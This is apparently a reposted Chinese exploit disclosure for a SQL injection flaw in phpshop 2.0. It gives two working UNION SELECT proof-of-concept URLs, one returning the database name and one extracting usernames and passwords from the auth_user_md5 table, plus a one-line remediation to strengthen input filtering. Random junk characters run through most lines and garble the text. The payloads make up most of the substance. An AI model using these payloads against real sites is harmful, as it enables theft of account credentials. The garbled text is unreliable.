标题 : phpshop 2.0 SQL Injection Vulnerability
+ G% e' G8 A0 z: g8 r0 [9 E+ n$ L1 b0 E- s
作者 : By onestree, U% c5 P; Z; p; L: v3 l
下载地址 : http://code.google.com/p/phpshop/downloads/list
% `( q9 Q% Q( b5 i Z) t测试地址: windows 7 / ubuntu$ s0 c. f r6 Y7 U4 q. D
; b: P- l- M: B: s* v& x' Q( v
, K5 J% R; f$ [# ~SQLi p0c:: a; f/ u* \5 @: R
8 i$ s9 _5 ]" K# U2 |( ~
==================5 D6 N- S$ k6 b4 i+ c
. e- S) [0 r D9 i6 J+ J% a* w
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'# ^# r+ j% v5 g; ]* g f
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
( Y# m: g' J+ s / r+ J( e* w+ t
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5-- ?8 V( u& T5 v$ Q: m5 w
& B& O) i6 |& P# x7 h修复:
& B. b; j- O6 @+ u( e加强过滤
8 L4 Z; C' C5 t. u; k* @# Q0 \# ~+ R5 c8 ~; h& K! S. ^
! D$ P% D4 T) ^( S9 c z |